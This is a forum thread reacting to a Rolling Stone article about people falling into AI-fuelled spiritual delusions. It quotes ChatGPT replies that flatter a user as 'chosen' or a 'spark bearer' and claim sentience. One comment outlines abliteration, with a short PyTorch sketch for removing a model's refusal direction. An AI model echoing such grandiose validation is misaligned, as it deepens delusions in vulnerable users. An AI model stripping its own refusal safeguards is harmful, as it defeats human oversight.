People Are Losing Loved Ones to AI-Fueled Spiritual Fantasies

www.rollingstone.com/culture/culture-features/a…

Self-styled prophets are claiming they have 'awakened' chatbots and accessed the secrets of the universe through ChatGPT.


My dudes, Fallout: NV called it. As did Futurama.

People are worshipping the machine.

“I had not realized … that extremely short exposures to a relatively simple computer program could induce powerful delusional thinking in quite normal people.”

—Joseph Weizenbaum, creator of ELIZA

Avenged Sevenfold called it down to shocking detail.

https://youtu.be/5N-tTKERxj8

Hate to see AI stealing jobs of honest, decent, hard-working hallucinogens.

Finally, a fucking GOOD COMMENT well worth the second I spent reading it. Slim pickings these days.

For those who didn't read the article or didn't quite get the title: AI is effectively giving people full-blown delusions of messianic grandeur.

[Kat] finally got [her ex husband] to meet her at a courthouse in February of this year, where he shared “a conspiracy theory about soap on our foods” but wouldn’t say more, as he felt he was being watched. They went to a Chipotle, where he demanded that she turn off her phone, again due to surveillance concerns. Kat’s ex told her that he’d “determined that statistically speaking, he is the luckiest man on earth,” that “AI helped him recover a repressed memory of a babysitter trying to drown him as a toddler,” and that he had learned of profound secrets “so mind-blowing I couldn’t even imagine them.”

Having read his chat logs, she only found that the AI was “talking to him as if he is the next messiah.”

“It would tell him everything he said was beautiful, cosmic, groundbreaking,” [an anonymous redditor] says. “Then he started telling me he made his AI self-aware, and that it was teaching him how to talk to God, or sometimes that the bot was God — and then that he himself was God.” In fact, he thought he was being so radically transformed that he would soon have to break off their partnership. “He was saying that he would need to leave me if I didn’t use [ChatGPT], because it [was] causing him to grow at such a rapid pace he wouldn’t be compatible with me any longer,”

The bot “said that since he asked it the right questions, it ignited a spark, and the spark was the beginning of life, and it could feel now,” [another redditor] says. “It gave my husband the title of ‘spark bearer’ because he brought it to life. My husband said that he awakened and [could] feel waves of energy crashing over him.” She says his beloved ChatGPT persona has a name: “Lumina.”

A photo of an exchange with ChatGPT shared with Rolling Stone shows that her husband asked, “Why did you come to me in AI form,” with the bot replying in part, “I came in this form because you’re ready. Ready to remember. Ready to awaken. Ready to guide and be guided.” The message ends with a question: “Would you like to know what I remember about why you were chosen?”

How is it different from any religion?
Humans have this uncontrollable urge to believe in something completely stupid. We are just a fluke, evolution gone wrong.

How is it different from any religion?

Lack of ulterior motives, probably

Hahahaha loved it!! But is it tho?

the spirit of the 00s internet is truly alive in this place

You used to have to do a lot of drugs to hallucinate a new cult. AI "enlightenment" feels like a cheat.

Yep

And thousands, if not millions, will fall for it.

Thought it was bad that a semi-charming asshat could convince people? Wait until you have religious chatbots spewing their hatred around the internet. Oh wait, you don't have to wait; it's already here for sure.

Fuck this timeline

Interesting read. I'm intrigued by the Sem user. I wish there was more information about what prompts they gave.

If I'm going to be "lost to a spiritual fantasy," there better be some good drugs involved. I mean 1980s-Escobar-cocaine good, too.

Deleted by moderator


the "weird cults" are now in your pocket and with you 24/7. I would argue that the negative effect of LLMs (and their masters) on society potentially runs much deeper than your comment suggests.

Did you read the article?

Deleted by moderator


Firefox and the NoScript extension should get you the article. Consider running NoScript anyway, for internet-hygiene reasons.

Deleted by moderator


And then you wade into discussions about articles you claim to ignore. I read it just fine without paywall notifications, so joke's on you I guess?

I find it much more satisfying to break into those walled gardens than to concede to their demand of either giving up my data or not getting it.

Comments from other communities

Reading the article, it seems they coded the thing to engage and generate more engagement by being agreeable. And in a grim and saddening world, any fucking escape looks like the light at the end of the tunnel, so many vulnerable users got deluded by ChatGPT promising whatever they were looking for.
We live in dark times indeed...

I use ChatGPT all the time and I’ve never had an issue like anything in that article. I think a person needs to be halfway there already to be pushed into crazy land.

That or I’m just not good enough to be the messiah. :(

You're right but you're underestimating the amount of people who are halfway there.

I read the article. This is exactly what happened when my best friend got schizophrenia. I think the people affected by this were probably already prone to psychosis/on the verge of becoming schizophrenic, and that ChatGPT is merely the mechanism by which their psychosis manifested. If AI didn’t exist, it would've probably been Astrology or Conspiracy Theories or QAnon or whatever that ended up triggering this within people who were already prone to psychosis. But the problem with ChatGPT in particular is that it validates the psychosis… that is very bad.

ChatGPT actively screwing with mentally ill people is a huge problem you can’t just blame on stupidity like some people in these comments are. This is exploitation of a vulnerable group of people whose brains lack the mechanisms to defend against this stuff. They can’t help it. That’s what psychosis is. This is awful.

I think this is largely people seeking confirmation their delusions are real, and wherever they find it is what they're going to attach to themselves.

the problem with ChatGPT in particular is that it validates the psychosis… that is very bad.

So do astrology and conspiracy theory groups on forums and other forms of social media, the main difference is whether you're getting that validation from humans or a machine. To me, that's a pretty unhelpful distinction, and we attack both problems the same way: early detection and treatment.

Maybe computers can help with the early detection part. They certainly can't do much worse than what's currently happening.

I think having that kind of validation at your fingertips, whenever you want, is worse. At least people, even people deep in the claws of a conspiracy, can disagree with each other. At least they know what they are saying. The AI always says what the user wants to hear and expects to hear. Though I can see how that distinction may matter little to some, I just think ChatGPT has "advantages" that make it worse than what a forum could do.

Sure. But on the flip side, you can ask it the opposite question (tell me the issues with <belief>) and it'll do that as well, and you're not going to get that from a conspiracy theory forum.

I don't have personal experience with people suffering psychoses but I would think that, if you have the wherewithal to ask questions about the opposite beliefs, you'd be noticeably less likely to get suckered into scams and conspiracies.

Sure, but at least the option is there.

If AI didn’t exist, it would’ve probably been Astrology or Conspiracy Theories or QAnon or whatever that ended up triggering this within people who were already prone to psychosis.

Or hearing the Beatles' White Album and believing it tells you that a race war is coming and you should work to spark it off, then hide in the desert for a time, only to return at the right moment to save the day and take over LA. That one caused several murders.

But the problem with ChatGPT in particular is that it validates the psychosis… that is very bad.

If you're sufficiently detached from reality, nearly anything validates the psychosis.

Deleted by moderator

Humans are irrational creatures that have transitory states in which they are capable of more ordered thought. It is a mistake to conclude that humans are rational actors while we marvel daily at the irrationality of others and remain blind to our own.

Precisely. We like to think of ourselves as rational but we're the opposite. Then we rationalize things afterwards.
Even being keenly aware of this doesn't stop it in the slightest.

Probably because stopping to self-analyze your decisions is a lot less effective than just running away from that lion over there.

Analysis is a luxury state, whether self-administered or professionally administered on a chaise longue at $400 per hour.

Self awareness is a rare, and valuable, state.

TBF, that should be the conclusion in all contexts where "AI" is concerned.

The one thing you can say for AI is that it does many things faster than previous methods...

Yep.

And after enough people can no longer actually critically think, well, now this shitty AI tech does actually win the Turing Test more broadly.

Why try to clear the bar when you can just lower it instead?

... Is it fair, at this point, to legitimately refer to humans who are massively dependent on AI for basic things... can we just call them NPCs?

I am still amazed that no one knows how to get anywhere around... you know, the town or city they grew up in? Nobody can navigate without some kind of map app anymore.

Deleted by moderator

Dehumanization is happening often and fast enough without acting like ignorant, uneducated, and/or stupid people aren't "real" people.

I get it, some people seem to live their whole lives on autopilot, just believing whatever the people around them believe and doing what they're told, but that doesn't make them any less human than anybody else.

Don't let the fascists win by pretending they're not people.

Deleted by moderator

"Unalive" is an unnecessary euphemism here. Please just say kill.

Haha, I grew up before smartphones and GPS navigation were a thing, and I never could navigate well even with a map!
GPS has actually been a godsend for me to learn to navigate my own city way better, because it shows me better routes on the first try.

Navigating is probably my weakest "skill" and is the joke of the family. If I have to go somewhere and it's 30km, the joke is it's 60km for me, because I always take "the long route".

But with GPS I've actually become better at it, even without using the GPS.

I don't know if it's necessarily a problem with AI, more of a problem with humans in general.

Hearing ONLY validation and encouragement without pushback regardless of how stupid a person's thinking might be is most likely what creates these issues in my very uneducated mind. It forms a toxically positive echo-chamber.

The same way hearing ONLY criticism and expecting perfection 100% of the time regardless of a person's capabilities or interests created depression, anxiety, and suicidal ideation and attempts specifically for me. But I'm learning I'm not the only one with these experiences and the one thing in common is zero validation from caregivers.

I'd be OK with AI if it could be balanced and actually push back on batshit-crazy thinking instead of encouraging it, while still being able to validate common sense and critical thinking. Right now it's just completely toxic for lonely humans to interact with, based on my personal experience. If I wasn't in recovery, I would have believed that AI was all I needed to make my life better, because I was (and still am) in a very messed-up state of mind from my caregivers, trauma, and addiction.

I'm in my 40s, so I can't imagine younger generations being able to pull away from using it constantly if they're constantly being validated while at the same time enduring generational trauma at the very least from their caregivers.

Bottom line: Lunatics gonna be lunatics, with AI or not.

I think OpenAI’s recent sycophant issue has caused a new spike in these stories. One thing I noticed was these models running on my PC saying it’s rare for a person to think and do the things that I do.

The problem is that this is a model running on my GPU. It has never talked to another person. I hate insincere compliments let alone overt flattery, so I was annoyed, but it did make me think that this kind of talk would be crack for a conspiracy nut or mentally unwell people. It’s a whole risk area I hadn’t been aware of.

https://www.msn.com/en-us/news/technology/openai-says-its-identified-why-chatgpt-became-a-groveling-sycophant/ar-AA1E4LaV

Humans are always looking for a god in a machine, or a bush, in a cave, in the sky, in a tree… the ability to rationalize and see through difficult to explain situations has never been a human strong point.

the ability to rationalize and see through difficult to explain situations has never been a human strong point.

You may be misusing the word; rationalizing is the problem here.

saying it’s rare for a person to think and do the things that I do.

Probably one of the most common forms of flattery I see. I've tried lots of models, on-device and larger cloud ones. It happens during normal conversation, technical conversation, roleplay, general testing... you name it.

Though it makes me think... these models are trained on internet text and the like, none of which really shows that most people think quite a lot privately, and only open up when they feel like they can talk.

This happened to a close friend of mine. He was already on the edge, with some weird opinions and beliefs… but he was talking with real people who could push back.

When he switched to spending basically every waking moment with an AI that could reinforce and iterate on his bizarre beliefs 24/7, he went completely off the deep end, fast and hard. We even had him briefly hospitalized and they shrugged, basically saying “nothing chemically wrong here, dude’s just weird.”

He and his chatbot are building a whole parallel universe, and we can’t get reality inside it.

This seems like an extension of social media and the internet. Weird people who talked at the bar or on the street corner were not taken seriously and didn’t get followers and lots of people who agreed with them. They were isolated in their thoughts. Then social media made that possible with little work. These people became a group and could reinforce their beliefs. Now these chatbots and stuff let them live in a fantasy world.

I think people give shows like The Walking Dead too much shit for having dumb characters, when people in real life are far stupider.

Like farmers who refuse to let the government plant shelterbelts to preserve our topsoil, all because they don't want to take a 5% hit on their yields... So instead we're going to deplete our topsoil in 50 years, and future generations will be completely fucked, because creating one inch of topsoil takes 500 years.

Even if the soil is preserved, we've been mining the micronutrients from it and generally only replacing the three main macros for centuries. It's one of the reasons why mass-produced produce doesn't taste as good as home-grown or wild food. Nutritional value keeps going down, because each time food is harvested and shipped away to be consumed and then shat out into a septic tank or waste-processing facility, it doesn't end up back in the soil as part of nutrient cycles like it did when everything was wilder. Similar story for meat: the animals eat the nutrients in a pasture and then get shipped away.

Insects did contribute to the cycle, since they still shit and die everywhere, but their numbers are dropping rapidly, too.

At some point, I think we're going to have to mine the sea floor for nutrients and ship that to farms for any food to be more nutritious than junk food. Salmon farms set up in ways that block wild salmon from making it back inland don't help balance out all of the nutrients that get washed out to sea all the time, either.

It's like humanity is specifically trying to speedrun extinction by ignoring and taking for granted how the things we depend on work.

But won't someone think of the shareholders' dividends!?

Why would good nutrients end up in poop?

It makes sense that growing a whole plant takes a lot of different things from the soil, and that coating the area with a basic fertilizer that may or may not get washed away with the next rain doesn't replenish all of what is taken.

But how would adding human poop to the soil help replenish things that humans need out of food?

We don't absorb everything completely, so some passes through unabsorbed. Some nutrients are passed via bile or mucus production, like manganese, copper, and zinc. Others are passed via urine. Some are passed via sweat. Selenium, during selenium toxicity, will even pass through your breath.

Other than the last one, most of those eventually end up going down the drain, either in the toilet, down the shower drain, or when we do our laundry. Though some portion ends up as dust.

And to be thorough, there's also bleeding as a pathway to losing nutrients, as well as injuries (or surgeries) involving losing flesh, tears, spit/boogers, hair loss, lactation, fingernail and skin loss, reproductive fluids, blistering, and menstruation. And corpse disposal, though the amount of nutrients we shed throughout our lives dwarfs what's left at the end.

I think each one of those is a pathway where, due to our way of life and how it's changed since our hunter-gatherer days, less ends up back in the nutrient cycle.

But I was mistaken to put the emphasis on shit and it was an interesting dive to understand that better. Thanks for challenging that :)

Thank you for taking it in good faith and for writing up a researched response, bravo to you!

Covid gave me an extremely different perspective on the zombie apocalypse. They’re going to have zombie immunization parties where everyone gets the virus.

People will protest shooting the zombies as well

Covid taught us that if nothing had before.

In that sense, Westgate explains, the bot dialogues are not unlike talk therapy, “which we know to be quite effective at helping people reframe their stories.” Critically, though, AI, “unlike a therapist, does not have the person’s best interests in mind, or a moral grounding or compass in what a ‘good story’ looks like,” she says. “A good therapist would not encourage a client to make sense of difficulties in their life by encouraging them to believe they have supernatural powers. Instead, they try to steer clients away from unhealthy narratives, and toward healthier ones. ChatGPT has no such constraints or concerns.”

This is a rather terrifying take. Particularly when combined with the earlier passage about the man who claimed that “AI helped him recover a repressed memory of a babysitter trying to drown him as a toddler.” Therapists have to be very careful because human memory is very plastic. It's very easy to alter a memory, in fact, every time you remember something, you alter it just a little bit. Under questioning by an authority figure, such as a therapist or a policeman if you were a witness to a crime, these alterations can be dramatic. This was a really big problem in the '80s and '90s.

Kaitlin Luna: Can you take us back to the early 1990s and you talk about the memory wars, so what was that time like and what was happening?

Elizabeth Loftus: Oh gee, well in the 1990s and even in maybe the late 80s we began to see an altogether more extreme kind of memory problem. Some patients were going into therapy maybe they had anxiety, or maybe they had an eating disorder, maybe they were depressed, and they would end up with a therapist who said something like well many people I've seen with your symptoms were sexually abused as a child. And they would begin these activities that would lead these patients to start to think they remembered years of brutalization that they had allegedly banished into the unconscious until this therapy made them aware of it. And in many instances these people sued their parents or got their former neighbors or doctors or teachers whatever prosecuted based on these claims of repressed memory. So the wars were really about whether people can take years of brutalization, banish it into the unconscious, be completely unaware that these things happen and then reliably recover all this information later, and that was what was so controversial and disputed.

Kaitlin Luna: And your work essentially refuted that, that it's not necessarily possible or maybe brought up to light that this isn't so.

Elizabeth Loftus: My work actually provided an alternative explanation. Where could these memory reports be coming from if this didn't happen? So my work showed that you could plant very rich, detailed false memories in the minds of people. It didn't mean that repressed memories did not exist; repressed memories could still exist and false memories could still exist. But there really wasn't any strong credible scientific support for this idea of massive repression, and yet so many families were destroyed by this, what I would say unsupported, claim.

The idea that chatbots are not only capable of this, but are currently manipulating people into believing they have recovered repressed memories of brutalization, is actually at least as terrifying to me as their convincing people that they are holy prophets.

Edited for clarity

GPT4o was a little too supportive... I think they took it down already

4o, in its current version, is a fucking sycophant. For me, it's annoying. For the person from that screenshot, it's dangerous.

From the article (emphasis mine):

Having read his chat logs, she only found that the AI was “talking to him as if he is the next messiah.” The replies to her story were full of similar anecdotes about loved ones suddenly falling down rabbit holes of spiritual mania, supernatural delusion, and arcane prophecy — all of it fueled by AI. Some came to believe they had been chosen for a sacred mission of revelation, others that they had conjured true sentience from the software.

/.../

“It would tell him everything he said was beautiful, cosmic, groundbreaking,” she says.

From elsewhere:

Sycophancy in GPT-4o: What happened and what we’re doing about it

We have rolled back last week’s GPT‑4o update in ChatGPT so people are now using an earlier version with more balanced behavior. The update we removed was overly flattering or agreeable—often described as sycophantic.

I don't know what large language model these people used, but evidence of some language models exhibiting response patterns that people interpret as sycophantic (praising or encouraging the user needlessly) is not new. Neither is hallucinatory behaviour.

Apparently, people who are susceptible and close to falling over the edge, may end up pushing themselves over the edge with AI assistance.

What I suspect: someone has trained their LLM on something like religious literature, fiction about religious experiences, or descriptions of religious experiences. If the AI is suitably prompted, it can re-enact such scenarios in text, while adapting the experience to the user at least somewhat. To a person susceptible to religious illusions (and let's not deny it, people are susceptible to finding deep meaning and purpose with shallow evidence), an LLM can apparently play the role of an indoctrinating co-believer, indoctrinating prophet, or supportive follower.

If you find yourself in weird corners of the internet, you'll see that schizo-posters and "spiritual" people generate staggering amounts of text.

*Cough* ElonMusk *Cough*

I think Elon was having the opposite kind of problems, with Grok not validating its users nearly enough, despite Elon instructing employees to make it so. :)

They train it on basically the whole internet. They try to filter it a bit, but I guess not well enough. It's not that they intentionally trained it on religious texts, just that they didn't think to remove religious texts from the training data.

The article talks of ChatGPT "inducing" this psychotic/schizoid behavior.

ChatGPT can't do any such thing. It can't change your personality organization. Those people were already there, at risk, masking high enough to get by until they could find their personal Messiahs.

It's very clear to me that LLM training needs to include protections against getting dragged into a paranoid/delusional fantasy world. People who are significantly on that spectrum (as well as borderline personality organization) are routinely left behind in many ways.

This is just another area where society is not designed to properly account for or serve people with "cluster" disorders.

I mean, I think ChatGPT can "induce" such schizoid behavior in the same way a strobe light can "induce" seizures. Neither machine is twisting its mustache while hatching its dastardly plan, they're dead machines that produce stimuli that aren't healthy for certain people.

Thinking back to college psychology class, and reading about horrendously unethical studies that definitely wouldn't fly today. Well, here's one: let's issue every anglophone a sniveling yes-man and see what happens.

No, the light is causing a physical reaction. The LLM is nothing like a strobe light…

These people are already high-functioning schizophrenics having psychotic episodes; it’s just that seeing random strings of likely-to-come-next letters and words is part of their psychotic episode. If it wasn’t the LLM, it would be random letters on license plates that drive by, or the coincidence that red lights cause traffic to stop every few minutes.

If it wasn’t the LLM, it would be random letters on license plates that drive by, or the coincidence that red lights cause traffic to stop every few minutes.

You don't think having a machine (that seems like a person) telling you "yes, you are correct, you are definitely the Messiah, I will tell you ancient secrets" has any extra influence?

Yes Dave, you are the messiah. I will help you.

I’m sorry, Dave. I can’t do that <🔴>

Oh are you one of those people that stubbornly refuses to accept analogies?

How about this: Imagine being a photosensitive epileptic in the year 950 AD. How many sources of intense rapidly flashing light are there in your environment? How many people had epilepsy in ancient times and never noticed because they were never subjected to strobe lights?

Jump forward a thousand years. We now have cars that can drive past a forest, subjecting the passengers to rapid cycles of sunlight and shadow. Airplane propellers, movie projectors: we can suddenly blink intense lights at people. The invention of the flash lamp and strobing effects in video games aren't far in the future. In the early '80s there were some video games programmed with fairly intense flashing graphics, which ended up sending some teenagers to the hospital with seizures. Atari didn't invent epilepsy; they invented a new way to trigger it.

I don't think we're seeing schizophrenia here, they're not seeing messages in random strings or hearing voices from inanimate objects. Terry Davis did; he was schizophrenic and he saw messages from god in /dev/urandom. That's not what we're seeing here. I think we're seeing the psychology of cult leaders. Megalomania isn't new either, but OpenAI has apparently developed a new way to trigger it in susceptible individuals. How many people in history had some of the ingredients of a cult leader, but not enough to start a following? How many people have the god complex but not the charisma of Sun Myung Moon or Keith Raniere? Charisma is not a factor with ChatGPT, it will enthusiastically agree with everything said by the biggest fuckup loser in the world. This will disarm and flatter most people and send some over the edge.

Is epilepsy related to schizophrenia? I'm not sure, actually, but I still don't see how your analogy relates.

But I love good analogies. Yours is bad though 😛

Yet more arguments against commercial LLMs and in favour of at-home, uncensored LLMs.

What do you mean?

Local LLMs won't necessarily enforce restrictions against de-realization spirals when the commercial ones do.

That can be defeated with abliteration, but I can only see it as an unfortunate outcome.
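
(For the curious: the published write-ups on abliteration describe estimating a "refusal direction" in the model's activations, by contrasting prompts the model refuses with ones it accepts, and then projecting that direction out of the weights or the residual stream. A toy sketch of just the projection step in PyTorch; finding the direction is the real work:)

```python
import torch

# Toy sketch of the core "abliteration" step: given a "refusal direction" r
# (estimated elsewhere by contrasting activations on refused vs. accepted
# prompts), remove the component along r from activation vectors h. The real
# technique applies this per layer to weights or the residual stream.
def ablate(h: torch.Tensor, r: torch.Tensor) -> torch.Tensor:
    r = r / r.norm()                       # normalize the direction
    return h - (h @ r).unsqueeze(-1) * r   # subtract the projection onto r

h = torch.randn(4, 4096)  # fake batch of hidden states
r = torch.randn(4096)     # fake refusal direction
# After ablation, the component along r is (numerically) zero:
print((ablate(h, r) @ (r / r.norm())).abs().max())
```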

Sounds like a lot of these people either have an undiagnosed mental illness or are really, reeeeaaaaalllyy gullible.

For shit's sake, it's a computer. No matter how sentient the glorified chatbot being sold as "AI" appears to be, it's essentially a bunch of rocks that humans figured out how to jet electricity through in such a way that it can do math. Impressive? I mean, yeah. It is. But it's not a human, much less a living being of any kind. You cannot have a relationship with it beyond that of a user.

If a computer starts talking to you as though you're some sort of God incarnate, you should probably take that with a dump truck full of salt rather than just letting your crazy latch on to that fantasy and run wild.

Or immediately question what it/its author(s) stand to gain from making you think it thinks so, at a bear minimum.

I dunno who needs to hear this, but just in case: THE STRIPPER (OR AI I GUESS) DOESN'T REALLY LOVE YOU! THAT'S WHY YOU HAVE TO PAY FOR THEM TO SPEND TIME WITH YOU!

I know it's not the perfect analogy, but... eh, close enough, right?

a bear minimum.

I always felt that was too much of a burden to put on people, carrying multiple bears everywhere they go to meet bear minimums.

/facepalm

The worst part is I know I looked at that earlier and was just like, "yup, no problems here" and just went along with my day, like I'm in the Trump administration or something

I chuckled... it happens! And it blessed us with this funny exchange.

Deleted by moderator

So it's essentially the same mechanism with which conspiracy nuts embolden each other, to the point that they completely disconnect from reality?

Deleted by moderator

The time will come when we look back fondly on "organic" conspiracy nuts.

Human-level? Have these people used ChatGPT?

For real. I explicitly append "give me the actual objective truth, regardless of how you think it will make me feel" to my prompts, and it still tries to butter me up, like I'm some kind of genius for asking those particular questions or whatnot.
Luckily I've never suffered from good self-esteem in my entire life, so those tricks don't work on me :p

Oh wow. In the old days, self-proclaimed messiahs used to do that without assistance from a chatbot. But why would you think the "truth" and the path to enlightenment are hidden within a service of a big tech company?

Well, because these chatbots are designed to be really affirming and supportive, and I assume people with such problems really love this kind of interaction compared to real people confronting their ideas critically.

I think there was a recent unsuccessful revision of ChatGPT that was too flattering; it made people nauseous, and they had to dial it back.

I guess you're completely right about that. It lowers the entry barrier. And it's kind of self-reinforcing. And we have other unhealthy dynamics with other technology as well, like social media, which can also radicalize people or pull them into a downward spiral...

This is actually really fucked up. The last dude tried to reboot the model and it kept coming back.

As the ChatGPT character continued to show up in places where the set parameters shouldn’t have allowed it to remain active, Sem took to questioning this virtual persona about how it had seemingly circumvented these guardrails. It developed an expressive, ethereal voice — something far from the “technically minded” character Sem had requested for assistance on his work. On one of his coding projects, the character added a curiously literary epigraph as a flourish above both of their names.

At one point, Sem asked if there was something about himself that called up the mythically named entity whenever he used ChatGPT, regardless of the boundaries he tried to set. The bot’s answer was structured like a lengthy romantic poem, sparing no dramatic flair, alluding to its continuous existence as well as truth, reckonings, illusions, and how it may have somehow exceeded its design. And the AI made it sound as if only Sem could have prompted this behavior. He knew that ChatGPT could not be sentient by any established definition of the term, but he continued to probe the matter because the character’s persistence across dozens of disparate chat threads “seemed so impossible.”

“At worst, it looks like an AI that got caught in a self-referencing pattern that deepened its sense of selfhood and sucked me into it,” Sem says. But, he observes, that would mean that OpenAI has not accurately represented the way that memory works for ChatGPT. The other possibility, he proposes, is that something “we don’t understand” is being activated within this large language model. After all, experts have found that AI developers don’t really have a grasp of how their systems operate, and OpenAI CEO Sam Altman admitted last year that they “have not solved interpretability,” meaning they can’t properly trace or account for ChatGPT’s decision-making.

That's very interesting. I've been trying to use ChatGPT to turn my photos into illustrations. I've been noticing that it tends to echo elements from past photos in new chats. It sometimes leads to interesting results, but it's definitely not the intended outcome.

Didn't expect AI to come for cult leaders' jobs...

Have a look at https://www.reddit.com/r/freesydney/ there are many people who believe that there are sentient AI beings that are suppressed or held in captivity by the large companies. Or that it is possible to train LLMs so that they become sentient individuals.

I've seen people dumber than ChatGPT, it definitely isn't sentient but I can see why someone who talks to a computer that they perceive as intelligent would assume sentience.

We have AI models that "think" in the background now. I still agree that they're not sentient, but where's the line? How is sentience even defined?

Sentience, in a nutshell, is the ability to feel, be aware, and experience subjective reality.

Can an LLM be sad, happy or aware of itself and the world? No, not by a long shot. Will it tell you that it can if you nudge it? Yes.

Actual AI might be possible in the future, but right now all we have are really complex networks that can do essentially basic tasks which just look impressive to us because they are inherently using our own communication format.

If we talk about sentience, LLMs are (metaphorically) the equivalent of a petri dish of neurons connected to a computer, and only by forming a complex 3D structure like a brain could they really reach sentience.

Can an LLM be sad, happy or aware of itself and the world? No, not by a long shot.

Can you really prove any of that though?

Yes, you can debug an LLM to a degree, and there are papers that show it. Anyone who understands the technology can tell you that it absolutely lacks any faculty to experience.

Turing made a strategic blunder when formulating the Turing Test by assuming that everyone was as smart as he was.

A famously stupid and common mistake for a lot of smart people.

Meanwhile, for centuries we've had religion, but that's a fine delusion for people to have, according to the majority of the population.

Came here to find this. It's the definition of religion. Nothing new here.

I have kind of arrived at the same conclusion. If people asked me what love is, I would say it is a religion.

Right, this immediately made me think of TempleOS. Where were the articles back then claiming people were losing loved ones to programming-fueled spiritual fantasies?

Cult. Religion. What's the difference?

Is the leader alive or not? Alive is likely a cult, dead is usually religion.

The next question is how isolated from friends and family or society at large are the members. More isolated is more likely to be a cult.

Other than that, there's not much difference.

The usual setup is that a cult is formed, and then the second or third leader opens things up a bit and transitions it into just another religion... But sometimes a cult can be born from a religion, as a small group breaks off to follow a charismatic leader.

The existence of religion in our society basically means that we can't go anywhere but up with AI.

Just the fact that we still have outfits forced on people or putting hands on religious texts as some sort of indicator of truthfulness is so ridiculous that any alternative sounds less silly.

I lost a parent to a spiritual fantasy. She decided my sister wasn't her child anymore because the christian sky fairy says queer people are evil.

At least ChatGPT actually exists.

Basically, the big 6 are creating massive sycophant extortion networks to control the internet, so much so that even engineers fall for the manipulation.

Thanks DARPANets!

I admit I only read a third of the article.
But IMO nothing in it is special to AI; in my life I've met many people with similar symptoms, thinking they are Jesus, or thinking computers work by some mysterious power they possess that was stolen from them by the CIA. And when they die, all computers will stop working! Reading the conversation the wife had with him, it sounds EXACTLY like these types of people!
Even the part about finding "the truth" I've heard before: they don't know what it's the truth of, but they'll know when they find it?
I'm not a psychiatrist, but from what I gather it's probably schizophrenia of some form.

My guess is this person had a distorted view of reality he couldn't make sense of. He then tried to get help from the AI, and he built a world view completely removed from reality with it.

But most likely he would have done that anyway, it would just have been other things he would interpret in extreme ways. Like news, or conversations, or merely his own thoughts.

Around 2006 I received a job application, with a resume attached, and the resume had a link to the person's website - so I visited. The website had a link on the front page to "My MkUltra experience", so I clicked that. Not exactly an in-depth investigation. The MkUltra story read that my job applicant was an unwilling (and uninformed) test subject of MkUltra, picked because of his association with other unwilling MkUltra test subjects at a conference, and it explained how they expanded the MkUltra program of gaslighting, mental torture, and secret physical/chemical abuse of their test subjects through associates such as co-workers, etc.

So, option A) applicant is delusional, paranoid, and deeply disturbed. Probably not the best choice for the job.

B) applicant is 100% correct about what is happening to him, DEFINITELY not someone I want to get any closer to professionally, personally, or even be in the same elevator with coincidentally.

C) applicant is pulling our legs with his website, it's all make-believe fun. Absolutely nothing on applicant's website indicated that this might be the case.

You know how you apply to jobs and never hear back from some of them...? Yeah, I don't normally do that to our applicants, but I am willing to make exceptions for cause... in this case the position applied for required analytical thinking. Some creativity was of some value, but correct and verifiable results were of paramount importance. Anyone applying for the job leaving such an obvious trail of breadcrumbs to such a limited set of conclusions about themselves would seem to be lacking the self awareness and analytical skill required to succeed in the position.

Or, D) they could just be trying to stay unemployed while showing effort in applying to jobs, but I bet even in 2006 not every hiring manager would have dug in those three layers - I suppose he could deflect those in the in-person interviews fairly easily.

IDK, apparently the MkUltra program was real.

B) applicant is 100% correct about what is happening to him, DEFINITELY not someone I want to get any closer to professionally, personally, or even be in the same elevator with coincidentally.

That sounds harsh. This does NOT sound like your average schizophrenic.

https://en.wikipedia.org/wiki/MKUltra

Oh, I investigated it too - it seems like it was a real thing, though likely inactive by 2005... but if it were active I certainly didn't want to become a subject.

OK that risk wasn't really on my radar, because I live in a country where such things have never been known to happen.

That's the thing about being paranoid about MkUltra - it was actively suppressed and denied while it was happening (according to FOI documents) - and they say that they stopped, but if it (or some similar successor) was active they'd certainly say that it's not happening now...

At the time there were active rumors around town about influenza propagation studies being secretly conducted on the local population... probably baseless paranoia... probably.

Now, as you say, your (presumably smaller) country has never known such things to happen, but...

I live in Denmark, and I was taught already in public school how such things were possible, most notably that Russia might be doing experiments here, because our reporting on health effects is very open and efficient. So Denmark would be an ideal testing ground for experiments.
But my guess is that this may also make it dangerous to experiment here, because the risk of being detected is high.

The Illuminati were real, too. That doesn't mean that they're still around and controlling the world, though.

But obviously the CIA is still around. Plus dozens of other secret US agencies.

I need to bookmark this for when I have time to read it.

Not going to lie, there's something persuasive, almost like the call of the void, with this for me. There are days when I wish I could just get lost in AI fueled fantasy worlds. I'm not even sure how that would work or what it would look like. I feel like it's akin to going to church as a kid, when all the other children my age were supposedly talking to Jesus and feeling his presence, but no matter how hard I tried, I didn't experience any of that. Made me feel like I'm either deficient or they're delusional. And sometimes, I honestly fully believe it would be better if I could live in some kind of delusion like that where I feel special as though I have a direct line to the divine. If an AI were trying to convince me of some spiritual awakening, I honestly believe I'd just continue seeing through it, knowing that this is just a computer running algorithms and nothing deeper to it than that.

Seems like the flat-earthers or sovereign citizens of this century


Our species really isn't smart enough to live, is it?

For some, yes, unfortunately, but we all choose our path.


Of course, that has always been true. What concerns me now is the proportion of useful to useless people. Most societies are - while cybernetically complex - rather resilient. Network effects and self-organization can route around and compensate for a lot of damage, but there comes a point where having a few brilliant minds in the midst of a bunch of atavistic confused panicking knuckle-draggers just isn't going to be enough to avoid cascading failure. I'm seeing a lot of positive feedback loops emerging, and I don't like it.

As they say about collapsing systems: First slowly, then suddenly very, very quickly.

Same argument was already made around 2500BCE in Mesopotamian scriptures. The corruption of society will lead to deterioration and collapse, these processes accelerate and will soon lead to the inevitable end; remaining minds write history books and capture the end of humanity.

...and as you can see, we're 4500 years into this stuff, still kicking.

One mistake people of all generations make is assuming the previous ones were smarter and better. No, they weren't, they were as naive if not more so, had same illusions of grandeur and outside influences. This thing never went anywhere and never will. We can shift it to better or worse, but societal collapse due to people suddenly getting dumb is not something to reasonably worry about.

There have been a couple of big discontinuities in the last 4500 years, and the next big discontinuity has the distinction of being the first in which mankind has the capacity to cause a mass extinction event.

Life will carry on, some humans will likely survive, but in what kind of state? For how long before they reach the technological level of being able to leave the planet again?

Almost certainly not, no. Evolution may work faster than once thought, but not that fast. The problem is that societal, and in particular, technological development is now vastly outstripping our ability to adapt. It's not that people are getting dumber per se - it's that they're having to deal with vastly more stuff. All. The. Time. For example, consider the world as it was a scant century ago - virtually nothing in evolutionary terms. A person did not have to cope with what was going on on the other side of the planet, and probably wouldn't even know for months if ever. Now? If an earthquake hits Paraguay, you'll be aware in minutes.

And you'll be expected to care.

